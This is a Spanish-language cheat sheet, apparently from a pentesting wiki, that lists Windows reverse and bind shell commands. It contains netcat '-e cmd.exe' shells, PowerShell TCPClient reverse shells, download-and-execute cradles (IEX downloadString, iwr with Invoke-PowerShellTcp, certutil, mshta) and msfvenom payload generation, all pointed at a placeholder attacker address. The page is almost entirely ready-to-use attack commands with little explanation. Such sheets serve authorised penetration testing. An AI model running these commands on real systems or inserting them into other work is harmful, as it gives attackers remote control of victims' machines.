Windows

Netcat

# Máquina atacante
rlwrap nc -lvnp <listen-port>

# Máquina victima
.\nc.exe -e cmd.exe <attacker-IP-address> <listen-port>

PowerShell

Reverse shells

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker-IP-address>",<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse shell de Windows a Linux/Unix.

# Máquina atacante
# reverse shell (shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# HTTP server
python3 -m http.server 80
# Netcat
nc -lvnp <listen-port>

# Máquina victima
# descarga y ejecución de reverse shell
powershell IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/shell.ps1')

Reverse shell de Windows a Windows .

# Máquina atacante
# HTTP server
Add-Type -AssemblyName "System.Web";$HTTPListener=New-Object Net.HttpListener;$HTTPListener.Prefixes.Add("http://<attacker-IP-address>:80/");$HTTPListener.Start();While ($HTTPListener.IsListening){$HC=$HTTPListener.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type",[System.Web.MimeMapping]::GetMimeMapping($HC.Request.RawUrl));$Stream=[System.IO.File]::OpenRead((Join-Path $Pwd ($HC.Request.RawUrl)));$HRes.ContentLength64=$Stream.Length;$Stream.CopyTo($HRes.OutputStream);$Stream.Close();$HRes.Close()};$HTTPListener.Stop()
# Powercat
Import-Module .\powercat.ps1
powercat -l -v -p <listen-port>

# Máquina victima
# descarga y ejecución de reverse shell
powershell IEX(iwr http://<attacker-IP-address>:80/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress <attacker-IP-address> -Port <listen-port>

Bind shells

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]<listen-port>; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Metasploit

# Máquina atacante
msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-IP-address> lport=<listen-port> -f exe -o reverse-shell.exe
rlwrap nc -lvnp <listen-port>
python3 -m http.server 80

# Máquina victima
certutil.exe -f -urlcache -split http://<attacker-IP-address>:80/reverse-shell.exe c:\windows\temp\reverse-shell.exe && cmd.exe /c c:\windows\temp\reverse-shell.exe
# Máquina atacante
use exploit/windows/misc/hta_server
set SRVHOST <attacker-IP-address>
set SRVPORT <port>
run

# Máquina victima
mshta http://<attacker-IP-address>:<port>/<id>.hta

Archivo batch (.bat)

# Máquina atacante
nc -lvnp <listen-port>

# Máquina victima
echo C:\<path>\nc.exe -e cmd.exe <attacker-IP-address> <listen-port> > C:\<path>\<file.bat>

Última actualización